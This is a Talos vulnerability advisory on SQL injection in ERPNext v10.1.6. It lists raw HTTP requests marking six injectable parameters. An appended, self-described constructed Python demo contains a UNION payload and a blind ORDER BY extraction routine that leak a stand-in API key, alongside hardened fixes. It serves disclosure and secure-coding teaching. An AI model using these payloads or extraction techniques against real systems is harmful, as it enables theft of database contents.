Talos Vulnerability Report

TALOS-2018-0560

ERPNext SQL Injection Vulnerabilities

September 5, 2018
CVE Number

CVE-2018-3882, CVE-2018-3883, CVE-2018-3884, CVE-2018-3885

Summary

Exploitable SQL injection vulnerabilities exist in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injection, resulting in data compromise. Any authenticated user can trigger these vulnerabilities from a browser; no special tools are required.

Tested Versions

ERPNext v10.1.6 (master)

Product URLs

https://erpnext.com/

CVSSv3 Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

The following parameters are vulnerable to SQL injection attacks:

CVE-2018-3882 - searchfield parameter

The searchfield parameter can be used to perform an SQL injection attack as shown below:

GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

CVE-2018-3883 - employee parameter

The employee parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on

CVE-2018-3883 - sort_order parameter

The sort_order parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - sort_by parameter

The sort_by parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - start parameter

The start parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3885 - order_by parameter

The order_by parameter can be used to perform an SQL injection attack as shown below:

GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
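The six parameters above fall into two classes: values spliced into a WHERE clause (employee) and identifiers spliced into ORDER BY or LIMIT (searchfield, sort_by, sort_order, start, order_by). The second class matters because ORDER BY cannot be parameterised with bind variables, and a UNION is not available there, yet data still leaks through row ordering. The following is an added illustration written for this page; it is not Talos's proof-of-concept and not ERPNext's or Frappe's source. The table names, columns, rows and the stand-in secret are constructed, SQLite stands in for ERPNext's MariaDB backend, and the "vulnerable" functions reproduce only the concatenation pattern implied by the advisory, not the project's real queries. The hardened versions show the fix a practitioner would apply: bind values, allowlist identifiers, cast numeric offsets.

```python
"""Constructed reconstruction of the two SQLi classes in TALOS-2018-0560.

Not ERPNext/Frappe code: table names, rows and the stand-in secret are
made up, and SQLite replaces MariaDB so the file runs offline.
"""
import sqlite3
import string

# Constructed sample rows standing in for ERPNext stock and leave tables.
BIN_ROWS = [("WID-001", "Stores - WP", 10.0),
            ("WID-001", "Finished Goods - WP", 4.0),
            ("WID-002", "Stores - WP", 25.0)]
LEAVE_ROWS = [("EMP/0001", 12.0), ("EMP/0002", 20.0)]
# Constructed secret that the two endpoints should never be able to return.
USER_ROWS = [("Administrator", "s3cr3t-api-key")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tabBin (item_code TEXT, warehouse TEXT, projected_qty REAL)")
    conn.executemany("INSERT INTO tabBin VALUES (?, ?, ?)", BIN_ROWS)
    conn.execute("CREATE TABLE tabLeaveAllocation (employee TEXT, total_leaves REAL)")
    conn.executemany("INSERT INTO tabLeaveAllocation VALUES (?, ?)", LEAVE_ROWS)
    conn.execute("CREATE TABLE tabUser (name TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO tabUser VALUES (?, ?)", USER_ROWS)
    return conn


# --- vulnerable pattern: request parameters formatted into the SQL text ---

def leave_balance_vulnerable(conn, employee):
    # Value injection (the `employee` class): a quote closes the literal.
    sql = "SELECT total_leaves FROM tabLeaveAllocation WHERE employee = '%s'" % employee
    return conn.execute(sql).fetchall()


def item_dashboard_vulnerable(conn, item_code, start, sort_by, sort_order):
    # Identifier injection (the sort_by/sort_order/start class). item_code is
    # bound here because only the other three are named in the advisory.
    sql = ("SELECT item_code, warehouse, projected_qty FROM tabBin "
           "WHERE item_code = ? ORDER BY %s %s LIMIT 20 OFFSET %s"
           % (sort_by, sort_order, start))
    return conn.execute(sql, (item_code,)).fetchall()


def extract_api_key_via_sort_by(conn):
    """Boolean-based blind extraction through the ORDER BY column slot.

    A correct guess sorts by projected_qty (4.0 first); a wrong guess sorts
    by -projected_qty (10.0 first), so the first row leaks one bit per query.
    """
    probe = ("(CASE WHEN (SELECT substr(api_key,%d,1) FROM tabUser) = '%s' "
             "THEN projected_qty ELSE -projected_qty END)")
    key, pos = "", 1
    while True:
        for ch in string.ascii_lowercase + string.digits + "-":
            rows = item_dashboard_vulnerable(conn, "WID-001", "0", probe % (pos, ch), "asc")
            if rows[0][2] == 4.0:
                key += ch
                break
        else:
            return key  # substr() past the end matches nothing: key complete
        pos += 1


# --- hardened pattern: bind values, allowlist identifiers, cast numbers ---

ALLOWED_SORT_BY = {"projected_qty", "warehouse", "item_code"}
ALLOWED_SORT_ORDER = {"asc", "desc"}


def leave_balance_hardened(conn, employee):
    sql = "SELECT total_leaves FROM tabLeaveAllocation WHERE employee = ?"
    return conn.execute(sql, (employee,)).fetchall()


def item_dashboard_hardened(conn, item_code, start, sort_by, sort_order):
    if sort_by not in ALLOWED_SORT_BY:
        raise ValueError("sort_by not allowed: %r" % sort_by)
    order = sort_order.lower()
    if order not in ALLOWED_SORT_ORDER:
        raise ValueError("sort_order not allowed: %r" % sort_order)
    offset = int(start)  # "0 UNION ..." or "0 OR ..." raises ValueError here
    if offset < 0:
        raise ValueError("start must be non-negative")
    sql = ("SELECT item_code, warehouse, projected_qty FROM tabBin "
           "WHERE item_code = ? ORDER BY %s %s LIMIT 20 OFFSET ?" % (sort_by, order))
    return conn.execute(sql, (item_code, offset)).fetchall()


def rejects(fn, *args):
    """True if the hardened function refuses the input instead of running it."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    payload = "EMP/0001' UNION SELECT api_key FROM tabUser -- "
    print("vulnerable employee:", leave_balance_vulnerable(db, payload))
    print("hardened employee:  ", leave_balance_hardened(db, payload))
    print("blind via sort_by:  ", extract_api_key_via_sort_by(db))
    print("hardened sort_order rejected:",
          rejects(item_dashboard_hardened, db, "WID-001", "0", "projected_qty", "asc, 1"))
```

The allowlist is the important part: escaping cannot make `sort_by` or `order_by` safe, because a column name is not a string literal, and `int()` on `start` turns the LIMIT slot from free text into a number. The same treatment applies to `searchfield` in the search widget, which is likewise a column name chosen by the client.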

Timeline

2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release

Credit

Discovered by Yuri Kramarz of Security Advisory EMEAR